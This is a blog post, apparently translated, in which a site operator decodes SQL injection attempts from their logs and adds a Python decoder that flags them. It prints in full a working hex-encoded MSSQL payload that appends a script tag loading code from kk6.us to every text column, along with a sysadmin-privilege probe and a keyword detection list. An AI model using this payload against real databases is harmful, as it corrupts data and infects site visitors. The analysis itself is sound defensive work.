An article about kk6.us


Sorry, I forgot the URL of the original article.
Last time I mentioned that SQL injection using HEX encoding can bypass ordinary IDS. Sure enough, over the past few days the site logged exactly this kind of illegal scanning. Fortunately my site was prepared in advance. Let's see what these guys were up to: I checked the log files and picked out a few records:

Submitted parameter: 1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

Decode this: 0x730079007300610064006D0069006E00
Content: sysadmin

That is clear enough: it first checks whether the connection has sysadmin privileges. Next comes this one:

Submitted parameter: 1';dEcLaRe @s vArChAr(4000);sEt @s=cAsT(0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f520d0a aS vArChAr(4000));exec(@s);--

Decoding it, the content becomes: dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(vArChAr,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR

That still looks a bit messy, so here is the same thing converted to lowercase: declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''</title><script src=http://%6b%6b%36%2e%75%73/1.js></script>''') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

After decoding it is basically readable. A brief explanation: as long as the system has a SQL injection vulnerability, the code above will be executed. It uses a cursor to walk through every user table and every text column in the database and appends this code to each column: </title><script src=http://%6b%6b%36%2e%75%73/1.js></script>

The part (%6b%6b%36%2e%75%73) is also URL-encoded; decoded, it becomes: kk6.us
So the code inserted into the database columns is: </title><script src=http://kk6.us/1.js></script>

Now, as soon as your web page reads a column containing this code from the database, things go wrong: the page loads the 1.js file from kk6.us, and once you visit it, heh, you're done for...
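A small log-side decoder, added here as an example (not code from the original post), that reverses the two layers of obfuscation described above so that a filter or analyst can see the real payload: it decodes 0x... hex literals (detecting the UTF-16LE form used for the sysadmin probe, since IS_SRVROLEMEMBER takes an nvarchar argument), lowercases the mixed-case SQL, URL-decodes the %-encoded host, and flags the keywords the decoded payload contains. The sample parameters at the bottom are constructed from the records quoted in the post.

```python
import re
from urllib.parse import unquote

# SQL hex literals; runs shorter than 4 digits are ordinary numeric literals and are skipped.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{4,})")
# Keywords that appear only after decoding the payloads shown in the post.
INDICATORS = ("is_srvrolemember", "sysobjects", "syscolumns", "cursor", "exec(", "<script")


def decode_hex_literal(hex_digits: str) -> str:
    """Turn a SQL hex literal into text; UTF-16LE (nvarchar) is recognised by its zero high bytes."""
    if len(hex_digits) % 2:
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("latin-1")  # never raises, so every byte stays visible to the analyst


def analyze_request(param_value: str) -> dict:
    """Decode every hex literal in one request parameter and report injection indicators."""
    decoded = [decode_hex_literal(h) for h in HEX_LITERAL.findall(param_value)]
    # Lowercase (the payload used mIxEd cAsE) and URL-decode (the host was %-encoded).
    normalized = unquote(" ".join([param_value, *decoded]).lower())
    hits = sorted(kw for kw in INDICATORS if kw in normalized)
    return {"decoded": decoded, "normalized": normalized,
            "indicators": hits, "suspicious": bool(hits)}


# Constructed samples: the sysadmin probe quoted in the post, a short hex-encoded
# fragment modelled on the cursor payload (query only, no update), and a benign value.
SAMPLES = {
    "probe": "1 And Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1",
    "hexsql": "1';exec(cast(0x"
              + "declare c cursor for select a.name from sysobjects a,syscolumns b".encode().hex()
              + " as varchar(4000)));--",
    "benign": "42",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        result = analyze_request(value)
        print(f"{name}: suspicious={result['suspicious']} indicators={result['indicators']}")
```

Run it over the query-string parameters in your access log; any request whose decoded form hits an indicator is worth blocking at the application layer and checking against the database for rows that already contain the injected tag.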